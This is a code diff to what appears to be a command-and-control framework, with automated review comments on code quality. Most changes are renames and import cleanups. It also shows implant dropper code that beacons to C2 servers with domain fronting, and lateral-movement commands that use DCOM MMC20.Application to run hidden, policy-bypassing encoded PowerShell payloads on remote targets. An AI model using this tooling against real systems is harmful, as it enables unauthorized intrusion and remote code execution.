diff --git a/C2Server.py b/C2Server.py
index cbcf47d..cda589c 100644
--- a/C2Server.py
+++ b/C2Server.py
@@ -1,17 +1,21 @@
 #!/usr/bin/env python
-import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal
+import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, re, logging, ssl, signal, ssl
-from Implant import *
-from Tasks import *
-from Core import *
-from Colours import *
-from Help import *
-from DB import *
-from Payloads import *
-from Config import *
-from Cert import *
-from Help import *
+from Implant import Implant
+from Tasks import newTask
+from Core import decrypt, encrypt, default_response, decrypt_bytes_gzip
+from Colours import Colours
+from DB import select_item, get_implants_all, update_implant_lastseen, update_task, get_cmd_from_task_id, get_c2server_all
+from DB import update_item, get_task_owner, get_newimplanturl, initializedb, setupserver, new_urldetails, get_baseenckey
+from Payloads import Payloads
+from Config import ROOTDIR, ServerHeader, PayloadsDirectory, HTTPResponse, DownloadsDirectory, Database, HostnameIP
+from Config import QuickCommand, KillDate, DefaultSleep, DomainFrontHeader, ServerPort, urlConfig, HOST_NAME, PORT_NUMBER
+from Config import DownloadURI, Sounds, APIKEY, MobileNumber, URLS, SocksURLS, Insecure, UserAgent, Referrer, APIToken
+from Config import APIUser, EnableNotifications
+from Cert import create_self_signed_cert
+from Help import logopic
+from Utils import validate_sleep_time, randomuri, gen_key
 class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
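Review bot: The rewritten `import` line now lists `ssl` twice (`..., logging, ssl, signal, ssl`) and keeps the pre-existing duplicate `re`; both are harmless at runtime but any linter will flag them and they read like a merge slip. Suggest `import argparse, os, sys, re, datetime, time, base64, BaseHTTPServer, logging, ssl, signal`, or one module per line per PEP 8 now that the explicit-name imports below have already moved away from the wildcard style. Replacing `from X import *` with named imports is a good change; the body of `MyHandler` continues outside the hunk.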
@@ -429,7 +433,7 @@ if __name__ == '__main__':
 print("Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h")
 print(Colours.GREEN)
 sys.exit(1)
- setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications)
+ setupserver(HostnameIP,gen_key(),DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,ROOTDIR,ServerPort,QuickCommand,DownloadURI,"","","",Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications)
 rewriteFile = "%s/rewrite-rules.txt" % directory
 print "Creating Rewrite Rules in: " + rewriteFile
 print ""
diff --git a/Config.py b/Config.py
index 3839033..cfa7cb5 100644
--- a/Config.py
+++ b/Config.py
@@ -28,7 +28,7 @@ APIToken = ""
 APIUser = ""
 URLS = urlConfig.fetchUrls()
 SocksURLS = urlConfig.fetchSocks()
-Referer = "" # optional
+Referrer = "" # optional
 HTTPResponse = """
 404 Not Found
diff --git a/DB.py b/DB.py
index 68eccac..368c2ea 100644
--- a/DB.py
+++ b/DB.py
@@ -85,7 +85,7 @@ def initializedb():
 SocksURLS TEXT,
 Insecure TEXT,
 UserAgent TEXT,
- Referer TEXT,
+ Referrer TEXT,
 APIToken TEXT,
 APIUser TEXT,
 EnableNotifications TEXT);"""
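Review bot: Renaming the `C2Server` column from `Referer` to `Referrer` in the CREATE TABLE text comes with no migration, so a database file created by an earlier version keeps the old column name and the `INSERT INTO C2Server (... Referrer ...)` in `setupserver` (next hunk) will fail with a no-such-column error against it. If `initializedb` only creates the table when it is absent (the hunk does not show that clause), the mismatch stays silent until that insert runs. Either document that the database must be recreated after this upgrade, or add a one-off `ALTER TABLE C2Server RENAME COLUMN Referer TO Referrer` (SQLite 3.25 or later) guarded by a `PRAGMA table_info(C2Server)` check of the existing schema. The CREATE TABLE statement and `initializedb` begin outside the hunk.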
@@ -110,11 +110,11 @@ def initializedb():
 else:
 print("Error! cannot create the database connection.")
-def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications):
+def setupserver(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications):
 conn = sqlite3.connect(Database)
 conn.text_factory = str
 c = conn.cursor()
- c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referer,APIToken,APIUser,EnableNotifications))
+ c.execute("INSERT INTO C2Server (HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)",(HostnameIP,EncKey,DomainFrontHeader,DefaultSleep,KillDate,HTTPResponse,FolderPath,ServerPort,QuickCommand,DownloadURI,ProxyURL,ProxyUser,ProxyPass,Sounds,APIKEY,MobileNumber,URLS,SocksURLS,Insecure,UserAgent,Referrer,APIToken,APIUser,EnableNotifications))
 conn.commit()
 def get_c2server_all():
diff --git a/Files/dropper.cs b/Files/dropper.cs
index 083da5b..41245c5 100644
--- a/Files/dropper.cs
+++ b/Files/dropper.cs
@@ -74,7 +74,7 @@ public class Program
 x.Headers.Add("Host", df);
 x.Headers.Add("User-Agent", "#REPLACEUSERAGENT#");
- x.Headers.Add("Referer", "#REPLACEREFERER#");
+ x.Headers.Add("Referrer", "#REPLACEREFERER#");
 if (null != cookie) x.Headers.Add(System.Net.HttpRequestHeader.Cookie, $"SessionID={cookie}");
diff --git a/Files/dropper.ps1 b/Files/dropper.ps1
index 481b684..3be9f5b 100644
--- a/Files/dropper.ps1
+++ b/Files/dropper.ps1
@@ -52,7 +52,7 @@ $h="#REPLACEDOMAINFRONT#"
 if ($h -and (($psversiontable.CLRVersion.Major -gt 2))) {$wc.Headers.Add("Host",$h)} elseif($h){$script:s="https://$($h)#REPLACECONNECT#";$script:sc="https://$($h)"}
 $wc.Headers.Add("User-Agent","#REPLACEUSERAGENT#")
-$wc.Headers.Add("Referer","#REPLACEREFERER#")
+$wc.Headers.Add("Referrer","#REPLACEREFERER#")
 if ($proxyurl) {
 $wp = New-Object System.Net.WebProxy($proxyurl,$true);
 if ($username -and $password) {
diff --git a/ImplantHandler.py b/ImplantHandler.py
index 06cd438..7743537 100644
--- a/ImplantHandler.py
+++ b/ImplantHandler.py
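Review bot: `setupserver` opens a connection with `conn = sqlite3.connect(Database)` and never closes it; the body ends at `conn.commit()` and the next line is the `def get_c2server_all():` header, so the handle is left to the garbage collector, and a failing `INSERT` leaves it open as well. Add `conn.close()` after the commit, or run the cursor work under `with conn:` followed by an explicit close so both paths release the file. Separately, the 24-positional-argument signature means a reordering at the call site in C2Server.py would not be caught by this rename; calling with keyword arguments would make that call self-checking.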
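Review bot: In `x.Headers.Add("Referrer", "#REPLACEREFERER#")` the first argument is the HTTP header field name, not a local identifier, and HTTP defines that field as `Referer` (RFC 7231 §5.5.2); the renamed line therefore emits a non-standard `Referrer` header that a receiving server will not interpret as the referrer field. The same applies to `$wc.Headers.Add("Referrer","#REPLACEREFERER#")` in Files/dropper.ps1 and to the `Referrer` line in Modules/Invoke-DaisyChain.ps1. If the intent was only to correct the Python identifier spelling, these three lines should keep `"Referer"` while the Python names change, and a comment such as `// "Referer" is the on-the-wire spelling fixed by the HTTP spec` would stop the next cleanup from repeating this. The enclosing methods start outside the hunks.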
@@ -2,18 +2,22 @@ import os, time, readline, base64, re, traceback, glob, sys, argparse, shlex, signal, subprocess, argparse, datetime
 from sqlite3 import Error
-from Help import *
-from AutoLoads import *
-from DB import *
-from Colours import *
-from Config import *
-from HTML import *
-from TabComplete import *
-from Payloads import *
-from Core import *
-from Alias import *
-from Opsec import *
-from Utils import validate_sleep_time
+from Help import logopic, COMMANDS, posh_help, posh_help1, posh_help2, posh_help3, posh_help4, posh_help5, posh_help6
+from Help import posh_help6, posh_help7, posh_help8, pre_help, PRECOMMANDS, py_help1, sharp_help1, UXCOMMANDS, SHARPCOMMANDS
+from AutoLoads import check_module_loaded, run_autoloads
+from DB import update_item, get_c2server_all, get_implants_all, get_tasks, get_implantdetails, new_urldetails
+from DB import get_newimplanturl, get_implantbyid, new_task, get_implants, get_history_dict, get_lastcommand
+from DB import new_commandhistory, get_c2urls, del_autorun, del_autoruns, add_autorun, get_autorun, get_newtasks_all
+from DB import drop_newtasks, get_implanttype, update_label, update_sleep, get_history, kill_implant, unhide_implant
+from DB import get_pid, get_allurls, get_sharpurls, get_randomuri, get_hostdetails, select_item
+from Colours import Colours
+from Config import ROOTDIR, ModulesDirectory, PayloadsDirectory, POSHDIR
+from HTML import generate_table, graphviz
+from TabComplete import tabCompleter
+from Payloads import Payloads
+from Alias import py_alias, ps_alias, cs_alias
+from Opsec import ps_opsec
+from Utils import validate_sleep_time, gen_key, randomuri
 def catch_exit(signum, frame):
 sys.exit(0)
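Review bot: `posh_help6` is imported twice in the new explicit-import block, at the end of the first `from Help import ...` line and again at the start of the second; drop one occurrence, e.g. `from Help import posh_help7, posh_help8, pre_help, PRECOMMANDS, py_help1, sharp_help1, UXCOMMANDS, SHARPCOMMANDS`. The unchanged first line also imports `argparse` twice, and this cleanup is the natural place to fix that. Note that `from Core import *` is removed with no named replacement, so any Core name this module reached through the wildcard would now be an unbound `NameError` at call time; the hunk cannot show whether any is used, so a grep of ImplantHandler.py against Core's exports is worth doing before merging.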
@@ -1018,7 +1022,7 @@ def runcommand(command, randomuri):
 with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
 params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
 params = params.sub("", command)
- p = re.compile(ur'(?<=-target.).*')
+ p = re.compile(r'(?<=-target.).*')
 target = re.search(p, command).group()
 pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c %s\",\"7\")" % (target,payload)
 new_task(pscommand, user, randomuri)
@@ -1029,7 +1033,7 @@ def runcommand(command, randomuri):
 daisyname = raw_input("Name required: ")
 if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
 with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
- p = re.compile(ur'(?<=-target.).*')
+ p = re.compile(r'(?<=-target.).*')
 target = re.search(p, command).group()
 pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
 new_task(pscommand, user, randomuri)
@@ -1042,7 +1046,7 @@ def runcommand(command, randomuri):
 "", "", "", "", C2[19], C2[20], C2[21], get_newimplanturl(), PayloadsDirectory)
 payload = newPayload.CreateRawBase()
- p = re.compile(ur'(?<=-target.).*')
+ p = re.compile(r'(?<=-target.).*')
 target = re.search(p, command).group()
 pscommand = "$c = [activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.Application\",\"%s\")); $c.Document.ActiveView.ExecuteShellCommand(\"C:\Windows\System32\cmd.exe\",$null,\"/c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s\",\"7\")" % (target,payload)
 new_task(pscommand, user, randomuri)
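Review bot: Directly after each new `p = re.compile(r'(?<=-target.).*')` line, `target = re.search(p, command).group()` raises `AttributeError` when the operator's command carries no `-target` argument, because `re.search` returns `None`; the same shape is in all three hunks (@@ -1018, @@ -1029, @@ -1042) and the `ur` → `r` change does not address it. Bind the match first and report the missing argument: `m = re.search(p, command)` / `if m is None: print("-target argument is required"); return` / `target = m.group()`, substituting whatever the neighbouring branches use to abort. In the first two hunks `p` also rebinds the name just used for the file handle in `with open(...) as p:`, which is legal but reads as a slip; a name like `target_re` avoids it. `runcommand` begins and ends outside the hunks.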
@@ -1321,7 +1325,7 @@ def commandloop(implant_id, user):
 except Exception as e:
 print (Colours.RED)
 print ("Error running against the selected implant ID, ensure you have typed the correct information")
- print Colours.END
+ print (Colours.END)
 #traceback.print_exc()
 #print "Error: %s" % e
 # remove the following comment when publishing to live
diff --git a/Modules/Invoke-DaisyChain.ps1 b/Modules/Invoke-DaisyChain.ps1
index faf55fb..07485e8 100644
--- a/Modules/Invoke-DaisyChain.ps1
+++ b/Modules/Invoke-DaisyChain.ps1
@@ -64,7 +64,7 @@ function Get-Webclient (`$Cookie) {
 `$proxyurl = `$proxyurl
 `$wc = New-Object System.Net.WebClient;
 `$wc.Headers.Add("User-Agent","Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko")
-`$wc.Headers.Add("Referer","")
+`$wc.Headers.Add("Referrer","")
 `$h=`$domainfrontheader
 if (`$h) {`$wc.Headers.Add("Host",`$h)}
 if (`$proxyurl) {
diff --git a/Payloads.py b/Payloads.py
index e05f929..3f894c0 100644
--- a/Payloads.py
+++ b/Payloads.py
@@ -10,7 +10,7 @@ class Payloads(object):
 quickstart = None
 def __init__(self, KillDate, Key, HostnameIP, Domainfrontheader, Serverport, Proxyuser, Proxypass, Proxyurl, ImplantType, Proxy,
- Insecure, UserAgent, Referer, ConnectURL, BaseDirectory):
+ Insecure, UserAgent, Referrer, ConnectURL, BaseDirectory):
 self.KillDate = KillDate
 self.Key = Key
 self.DomainFrontHeader = Domainfrontheader
@@ -23,7 +23,7 @@ class Payloads(object):
 self.ImplantType = ImplantType
 self.Insecure = Insecure
 self.UserAgent = UserAgent
- self.Referer = Referer
+ self.Referrer = Referrer
 self.ConnectURL = ConnectURL
 self.BaseDirectory = BaseDirectory
 self.C2Core = ""
@@ -72,7 +72,7 @@ class Payloads(object):
 cs8 = cs7.replace("#REPLACEDOMAINFRONT#",self.DomainFrontHeader)
 cs9 = cs8.replace("#REPLACECONNECT#",self.ConnectURL)
 cs10 = cs9.replace("#REPLACEUSERAGENT#",self.UserAgent)
- cs11 = cs10.replace("#REPLACEREFERER#",self.Referer)
+ cs11 = cs10.replace("#REPLACEREFERER#",self.Referrer)
 self.C2Core = cs11.replace("#REPLACEKEY#",self.Key)
 def QuickstartLog( self, txt ):
@@ -179,7 +179,7 @@ class Payloads(object):
 cs3 = cs2.replace("#REPLACEKILLDATE#",self.KillDate)
 cs4 = cs3.replace("#REPLACEDF#",self.DomainFrontHeader)
 cs5 = cs4.replace("#REPLACEUSERAGENT#",self.UserAgent)
- cs6 = cs5.replace("#REPLACEREFERER#",self.Referer)
+ cs6 = cs5.replace("#REPLACEREFERER#",self.Referrer)
 cs7 = cs6.replace("#REPLACEPROXYURL#",self.Proxyurl)
 cs8 = cs7.replace("#REPLACEPROXYUSER#",self.Proxyuser)
 cs9 = cs8.replace("#REPLACEPROXYPASSWORD#",self.Proxypass)